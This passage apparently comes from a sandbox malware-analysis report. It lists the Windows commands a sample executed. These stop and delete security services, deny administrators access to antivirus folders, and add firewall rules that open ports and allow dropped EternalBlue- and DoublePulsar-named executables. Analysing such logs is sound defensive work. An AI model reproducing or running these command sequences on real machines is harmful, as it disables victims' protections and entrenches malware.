        C:\Windows\SysWOW64\timeout.exe
        
        TIMEOUT /T 5 /NOBREAK
        7⤵
        Delays execution with timeout.exe
        
        PID:4484
        
        C:\Windows\SysWOW64\timeout.exe
        
        TIMEOUT /T 3 /NOBREAK
        7⤵
        Delays execution with timeout.exe
        
        PID:3312
        
        C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /IM 1.exe /T /F
        7⤵
        Kills process with taskkill
        
        PID:2412
        
        C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /IM P.exe /T /F
        7⤵
        Kills process with taskkill
        
        PID:2228
        
        C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows
        7⤵
        Views/modifies file attributes
        
        PID:5648
  - - C:\programdata\install\ink.exe
      C:\programdata\install\ink.exe
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:4348
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc start appidsvc
      4⤵
      PID:836
    - - C:\Windows\SysWOW64\sc.exe
        
        sc start appidsvc
        5⤵
        Launches sc.exe
        
        PID:1144
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc start appmgmt
      4⤵
      System Location Discovery: System Language Discovery
      PID:5568
    - - C:\Windows\SysWOW64\sc.exe
        
        sc start appmgmt
        5⤵
        Launches sc.exe
        
        PID:3228
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
      4⤵
      System Location Discovery: System Language Discovery
      PID:484
    - - C:\Windows\SysWOW64\sc.exe
        
        sc config appidsvc start= auto
        5⤵
        Launches sc.exe
        
        PID:4852
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
      4⤵
      PID:3952
    - - C:\Windows\SysWOW64\sc.exe
        
        sc config appmgmt start= auto
        5⤵
        Launches sc.exe
        
        PID:4176
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete swprv
      4⤵
      PID:764
    - - C:\Windows\SysWOW64\sc.exe
        
        sc delete swprv
        5⤵
        Launches sc.exe
        
        PID:5088
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc stop mbamservice
      4⤵
      PID:3648
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop mbamservice
        5⤵
        Launches sc.exe
        
        PID:4856
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
      4⤵
      PID:1072
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop bytefenceservice
        5⤵
        Launches sc.exe
        
        PID:1220
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
      4⤵
      System Location Discovery: System Language Discovery
      PID:1312
    - - C:\Windows\SysWOW64\sc.exe
        
        sc delete bytefenceservice
        5⤵
        Launches sc.exe
        
        PID:1396
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete mbamservice
      4⤵
      PID:32
    - - C:\Windows\SysWOW64\sc.exe
        
        sc delete mbamservice
        5⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:4796
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete crmsvc
      4⤵
      PID:1920
    - - C:\Windows\SysWOW64\sc.exe
        
        sc delete crmsvc
        5⤵
        Launches sc.exe
        
        PID:5380
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete "windows node"
      4⤵
      PID:800
    - - C:\Windows\SysWOW64\sc.exe
        
        sc delete "windows node"
        5⤵
        Launches sc.exe
        
        PID:2764
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer
      4⤵
      PID:4076
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop Adobeflashplayer
        5⤵
        Launches sc.exe
        
        PID:2428
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer
      4⤵
      PID:3312
    - - C:\Windows\SysWOW64\sc.exe
        
        sc delete AdobeFlashPlayer
        5⤵
        Launches sc.exe
        
        PID:1116
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc stop MoonTitle
      4⤵
      PID:2308
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop MoonTitle
        5⤵
        Launches sc.exe
        
        PID:5928
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete MoonTitle"
      4⤵
      PID:3952
    - - C:\Windows\SysWOW64\sc.exe
        
        sc delete MoonTitle"
        5⤵
        Launches sc.exe
        
        PID:3336
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc stop AudioServer
      4⤵
      System Location Discovery: System Language Discovery
      PID:724
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop AudioServer
        5⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:2688
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete AudioServer"
      4⤵
      PID:4668
    - - C:\Windows\SysWOW64\sc.exe
        
        sc delete AudioServer"
        5⤵
        Launches sc.exe
        
        PID:2192
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_64
      4⤵
      PID:4164
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop clr_optimization_v4.0.30318_64
        5⤵
        Launches sc.exe
        
        PID:1468
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"
      4⤵
      PID:576
    - - C:\Windows\SysWOW64\sc.exe
        
        sc delete clr_optimization_v4.0.30318_64"
        5⤵
        Launches sc.exe
        
        PID:3012
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql
      4⤵
      PID:3172
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop MicrosoftMysql
        5⤵
        Launches sc.exe
        
        PID:4472
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql
      4⤵
      PID:4876
    - - C:\Windows\SysWOW64\sc.exe
        
        sc delete MicrosoftMysql
        5⤵
        Launches sc.exe
        
        PID:2744
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
      4⤵
      PID:1312
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall set allprofiles state on
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:1608
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
      4⤵
      PID:5988
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:408
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
      4⤵
      System Location Discovery: System Language Discovery
      PID:3872
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:2764
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:4352
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
      4⤵
      PID:5100
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:5332
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
      4⤵
      System Location Discovery: System Language Discovery
      PID:3336
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:4956
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
      4⤵
      System Location Discovery: System Language Discovery
      PID:4936
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:5376
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
      4⤵
      PID:4856
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:3528
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
      4⤵
      PID:5220
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:5432
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
      4⤵
      PID:6112
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:2808
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:2572
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
      4⤵
      PID:1880
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:1920
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:4796
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
      4⤵
      System Location Discovery: System Language Discovery
      PID:5804
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:4676
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
      4⤵
      System Location Discovery: System Language Discovery
      PID:4724
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:4956
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
      4⤵
      PID:720
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:5992
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
      4⤵
      PID:6116
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:3312
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
      4⤵
      PID:6052
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:3892
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
      4⤵
      PID:836
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:4164
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:4092
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
      4⤵
      System Location Discovery: System Language Discovery
      PID:3720
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:5836
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
      4⤵
      PID:4856
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:4636
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
      4⤵
      PID:2440
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:4260
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
      4⤵
      System Location Discovery: System Language Discovery
      PID:1952
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:4904
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
      4⤵
      PID:4876
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:3884
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)
      4⤵
      System Location Discovery: System Language Discovery
      PID:5088
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4936
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
      4⤵
      PID:1224
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:1116
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)
      4⤵
      System Location Discovery: System Language Discovery
      PID:5332
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4672
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
      4⤵
      PID:488
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:6088
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny %username%:(OI)(CI)(F)
      4⤵
      System Location Discovery: System Language Discovery
      PID:3068
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Windows\svchost.exe" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:996
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
      4⤵
      System Location Discovery: System Language Discovery
      PID:4840
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        System Location Discovery: System Language Discovery
        
        PID:1300
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)
      4⤵
      PID:2432
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:232
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
      4⤵
      PID:1144
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:6112
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5200
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)
      4⤵
      PID:2540
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:6052
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:2824
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
      4⤵
      System Location Discovery: System Language Discovery
      PID:3096
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5144
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)
      4⤵
      System Location Discovery: System Language Discovery
      PID:5264
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:2008
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
      4⤵
      System Location Discovery: System Language Discovery
      PID:4492
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5576
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny %username%:(OI)(CI)(F)
      4⤵
      PID:2428
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\Zaxar" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        System Location Discovery: System Language Discovery
        
        PID:4796
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
      4⤵
      PID:4928
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4832
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)
      4⤵
      System Location Discovery: System Language Discovery
      PID:1952
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        System Location Discovery: System Language Discovery
        
        PID:3112
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
      4⤵
      PID:5088
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:1880
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)
      4⤵
      PID:5100
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls c:\programdata\Malwarebytes /deny Admin:(F)
        5⤵
        Modifies file permissions
        System Location Discovery: System Language Discovery
        
        PID:5052
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
      4⤵
      PID:5016
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls c:\programdata\Malwarebytes /deny System:(F)
        5⤵
        Modifies file permissions
        
        PID:1788
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)
      4⤵
      PID:3152
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:3892
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Programdata\MB3Install /deny Admin:(F)
        5⤵
        Modifies file permissions
        System Location Discovery: System Language Discovery
        
        PID:5972
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
      4⤵
      PID:6088
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Programdata\MB3Install /deny System:(F)
        5⤵
        Modifies file permissions
        
        PID:488
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)
      4⤵
      PID:3144
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        System Location Discovery: System Language Discovery
        
        PID:1908
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
      4⤵
      System Location Discovery: System Language Discovery
      PID:5332
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:5384
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny %username%:(OI)(CI)(F)
      4⤵
      System Location Discovery: System Language Discovery
      PID:3228
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        System Location Discovery: System Language Discovery
        
        PID:3096
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
      4⤵
      PID:2240
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:4260
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4352
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)
      4⤵
      PID:1544
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:3016
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)
      4⤵
      PID:996
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        System Location Discovery: System Language Discovery
        
        PID:1468
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)
      4⤵
      PID:5432
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        System Location Discovery: System Language Discovery
        
        PID:5412
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
      4⤵
      PID:724
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:232
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:4476
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)
      4⤵
      PID:2600
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:1608
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)
      4⤵
      PID:2076
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:1952
